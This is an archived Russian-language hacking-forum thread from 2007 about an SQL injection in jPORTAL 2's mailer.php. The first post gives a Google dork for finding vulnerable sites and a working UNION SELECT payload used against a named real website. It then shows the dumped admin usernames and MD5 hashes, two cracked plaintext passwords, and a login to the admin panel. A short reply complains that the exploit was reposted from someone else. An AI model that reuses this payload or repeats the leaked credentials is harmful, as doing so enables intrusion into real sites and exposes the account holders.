HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL-inj в jPORTAL 2
  #1  
Старый 08.11.2007, 14:29
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию SQL-inj в jPORTAL 2

Программа: jPORTAL 2
Цитата:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием mailer.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Код:
http://[site]/mailer.php?to=[sql]
При этом вывода на экран нет, однако взглянув на исходный код страницы и посмотрев значение скрытой переменной "to" мы получим нужную инфу из базы.
Поиск в Гугл: inurl:"mailer.php?to"
Пример:
Цель:_paslek.com
Код:
_http://paslek.com/mailer.php?to=1'+union+select+0,1,2,3,4,5,concat(nick,char(58),pass),7+from+admins+limit+1/*
Вывода на экран нет, смотрим исходник, видим:
Код:
<input style="font-weight: bold;" type="submit" name="ok" value="wyślij">
<input type="reset" name="Reset" value="wyczyść">
<input type="hidden" name="cmd" value="sendmail"><input type="hidden" name="to" value="Pawel:0309dd0f7ef7607d3525c7f0ce6d382d"></td>
Логин и пасс из таблицы админы мы вытащили, меняем limit и тянем остальные:
Red:b60e60bca1b299873cd7ff99013aba6d
Toudi:1bb23c088b74cc52b9d6e0737ba5c3c0
Wyga:2e5649795423dc0f85b359dc94718b5d
- - - - - - - - - - - - - - - - - - - - -
брутим MD5 хэши... получаем:
Pawel:0309dd0f7ef7607d3525c7f0ce6d382d:psikutas
Red:b60e60bca1b299873cd7ff99013aba6d:f4444ero
Далее ищем админку (я нашёл с 1 раза ;-)
Код:
_http://paslek.com/admin.php
Вводим первый логин и пасс и с удивлением обнаруживаем себя админом сайта Ну а дальше сами...

P.S. Это наглядный пример использования уязвимости, представлен только для ознакомления, все незаконные действия совершаемые Вами могут быть уголовно наказуемы и вся ответственность за неправоменрные действия лежит на вас.
Autor (обнаружил уязвимость): Kacper (а пример взлома мой ;-)
www.milw0rm.com
 
Ответить с цитированием

  #2  
Старый 09.11.2007, 10:29
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию

Цитата:
Autor (обнаружил уязвимость): Kacper
Не знаю зачем постить уязвимости других авторов. Может лучше пора самому искать баги в паблик движках? Ведь заюзать скулю, согласитесь, дело нехитрое.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ